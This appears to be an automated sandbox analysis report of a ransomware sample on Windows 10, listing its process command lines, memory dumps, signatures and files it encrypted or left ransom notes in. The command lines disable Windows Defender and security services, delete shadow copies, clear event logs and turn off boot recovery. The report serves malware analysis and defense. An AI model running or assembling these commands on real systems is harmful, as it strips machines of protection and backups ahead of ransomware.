"C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/1264-55-0x0000000000000000-mapping.dmp
memory/1660-56-0x0000000000000000-mapping.dmp
memory/1560-57-0x0000000000000000-mapping.dmp
memory/268-58-0x0000000000000000-mapping.dmp
memory/432-59-0x0000000000000000-mapping.dmp
memory/1488-60-0x0000000000000000-mapping.dmp
memory/912-61-0x0000000000000000-mapping.dmp
memory/324-62-0x0000000000000000-mapping.dmp
memory/1816-63-0x0000000000000000-mapping.dmp
memory/360-64-0x0000000000000000-mapping.dmp
memory/1368-65-0x0000000000000000-mapping.dmp
memory/428-66-0x0000000000000000-mapping.dmp
memory/1800-67-0x0000000000000000-mapping.dmp
memory/1828-68-0x0000000000000000-mapping.dmp
memory/1136-69-0x0000000000000000-mapping.dmp
memory/1628-70-0x0000000000000000-mapping.dmp
memory/2040-71-0x0000000000000000-mapping.dmp
memory/992-72-0x0000000000000000-mapping.dmp
memory/1360-73-0x0000000000000000-mapping.dmp
memory/1748-74-0x0000000000000000-mapping.dmp
memory/1324-75-0x0000000000000000-mapping.dmp
memory/844-76-0x0000000000000000-mapping.dmp
memory/1728-77-0x0000000000000000-mapping.dmp
memory/1132-78-0x0000000000000000-mapping.dmp
memory/916-79-0x0000000000000000-mapping.dmp
memory/1708-80-0x0000000000000000-mapping.dmp
memory/1576-81-0x0000000000000000-mapping.dmp
memory/1216-82-0x0000000000000000-mapping.dmp
memory/1040-83-0x0000000000000000-mapping.dmp
memory/668-84-0x0000000000000000-mapping.dmp
memory/1488-85-0x0000000000000000-mapping.dmp
memory/816-86-0x0000000000000000-mapping.dmp
memory/852-87-0x0000000000000000-mapping.dmp
memory/1860-88-0x0000000000000000-mapping.dmp
memory/1872-89-0x0000000000000000-mapping.dmp
memory/1808-90-0x0000000000000000-mapping.dmp
memory/1688-91-0x0000000000000000-mapping.dmp
memory/1668-92-0x0000000000000000-mapping.dmp
memory/1868-93-0x0000000000000000-mapping.dmp
memory/1308-94-0x0000000000000000-mapping.dmp
memory/568-95-0x0000000000000000-mapping.dmp
memory/988-96-0x0000000000000000-mapping.dmp
memory/1936-97-0x0000000000000000-mapping.dmp
memory/960-98-0x0000000000000000-mapping.dmp
memory/1608-99-0x0000000000000000-mapping.dmp
memory/460-100-0x0000000000000000-mapping.dmp
memory/1496-101-0x0000000000000000-mapping.dmp
memory/2028-102-0x0000000000000000-mapping.dmp
memory/1676-103-0x0000000000000000-mapping.dmp
memory/1828-104-0x0000000000000000-mapping.dmp
memory/732-105-0x0000000000000000-mapping.dmp
memory/1048-106-0x0000000000000000-mapping.dmp
memory/1740-107-0x0000000000000000-mapping.dmp
memory/596-108-0x0000000000000000-mapping.dmp
memory/1508-109-0x0000000000000000-mapping.dmp
memory/1916-110-0x0000000000000000-mapping.dmp
memory/1600-111-0x0000000000000000-mapping.dmp
memory/528-112-0x0000000000000000-mapping.dmp
memory/1240-113-0x0000000000000000-mapping.dmp
memory/1240-114-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp
memory/1416-115-0x0000000000000000-mapping.dmp
memory/1596-117-0x0000000000000000-mapping.dmp
memory/1736-119-0x0000000000000000-mapping.dmp
memory/656-120-0x0000000000000000-mapping.dmp
memory/2032-121-0x0000000000000000-mapping.dmp
memory/2088-124-0x0000000002700000-0x0000000002702000-memory.dmp
memory/2088-125-0x0000000002702000-0x0000000002704000-memory.dmp
memory/2088-126-0x0000000002704000-0x0000000002707000-memory.dmp
memory/2088-123-0x000007FEF2FC0000-0x000007FEF3B1D000-memory.dmp
memory/2088-127-0x000000001B6F0000-0x000000001B9EF000-memory.dmp
memory/2088-128-0x000000000270B000-0x000000000272A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | f2bde13962b7bcce5d9fc35a61c054af |
| SHA1 | 28dbbccdda3c3c74cb63c01fd53bb625bdd7bb4f |
| SHA256 | 834eea2f9f3e618c1bc50b3b934682f33269edb94c3f1aa5ad99e1708a40891b |
| SHA512 | 6fd44341268f41157480941c1f5b75b0ce0742cfc63f6f8c9978bc22239b923918cc5ae7881ed099b3f8bcd201e935232a19a5e7c918cc499039bb4cbf383eeb |
memory/2184-131-0x000007FEF2620000-0x000007FEF317D000-memory.dmp
memory/2184-132-0x0000000002540000-0x0000000002542000-memory.dmp
memory/2184-133-0x0000000002542000-0x0000000002544000-memory.dmp
memory/2184-134-0x0000000002544000-0x0000000002547000-memory.dmp
memory/2184-135-0x000000000254B000-0x000000000256A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-05 13:28
Reported
2022-01-05 13:39
Platform
win10-en-20211208
Max time kernel
119s
Max time network
185s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailWideTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcDemoR_BypassTrial365-ppd.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubLargeTile.scale-125_contrast-high.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.Awards\Assets\Sign_in_size.jpg | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Microsoft.Apps.People.BackgroundTasks.winmd | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-ul-oob.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_EAAAABAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.boot.tree.dat.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.POWERPNT.16.1033.hxn.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_NAAAADQAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\ja\n8pw_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\FPA_f4\FA000000005.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\CardBacks\Western.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-96.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\cstm_brand_preview2x.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\ui-strings.js.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\n8pw_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXT.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\pg_60x42.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\km_16x11.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-150_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sv.txt.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\13c.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Icon_Layout.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\ui-strings.js.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\n8pw_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\News\news_bottom.jpg | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GADUGI.TTF.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6584_24x24x32.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7989_20x20x32.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Google.scale-200.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-40.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fr-FR\TipTsf.dll.mui | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ppd.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\AugLoop\third-party-notices.txt.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\198.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\n8pw_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_CAAAAAgAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\Pitchbook.potx.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_MgAAADIAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\heidy.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\SmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-BA\msipc.dll.mui.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_PAAAADwAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-white\LargeTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-36_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-ppd.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_PAAAADwAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
